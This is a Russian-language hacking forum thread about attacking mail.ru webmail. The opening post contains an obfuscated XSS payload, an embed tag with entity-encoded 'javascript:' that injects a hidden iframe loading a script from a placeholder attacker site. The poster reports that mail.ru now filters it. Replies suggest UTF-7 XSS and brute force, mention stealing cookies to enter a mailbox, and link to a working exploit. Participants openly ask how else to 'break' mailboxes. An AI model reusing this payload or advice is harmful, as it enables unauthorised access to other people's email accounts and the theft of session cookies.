проблема с mail.ru

сделал все как написано в вашей статье, себе на сайт залил файл с формой, а на нужный мыльник отправил

HTML:

<embed src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58status=location;document.getElementById('xxx').innerHTML='<&#105&#102&#114&#97&#109&#101 src=http://yoursite.ru/yourscript.html width=0 height=0></&#105&#102&#114&#97&#109&#101>';this.wav" width=0 height=0> <p id='xxx'>

мыльник который хочу сломать - мой =) т.е. я знаю от него пароль, просто на своём эксперементирую =) когда я открыл тот ящик куда пришел выше указанный код, я заметил, что, по идее хтмл кода-то не должно быть видно, а он походу отфильтровывается теперь...т.е. код отосланный мной, его видно в письме, и он, естессно, не пашет...
зы: вначале письмо в хтмл формате (не аттачем)...
вот...че такое?

 

там поставили новые фильтры
теперь c наличием xss - там проблема

 

Мдя...Mail.ru обновился....

 

*** и чего...теперь там дыр нету? как еще можно ломануть? =)
зы: социнженерью не предлагать...

from moderator : не матерись

 

Почитайте "Использование UTF-7 в атаках класса XSS"

 

раз не СИ, так брут -)

 

найти XSS еще не значит ломануть. С её помощью там ничего не сделаешь, только настроишь пересылку, что весьма затруднительно реализовать. Ну или просто зайдешь в ящик, похитив куки.
А пример рабочей XSS вот здесь можно найти
http://forum.antichat.ru/showthread.php?p=46400#post46400&conly=

 

уже не пашет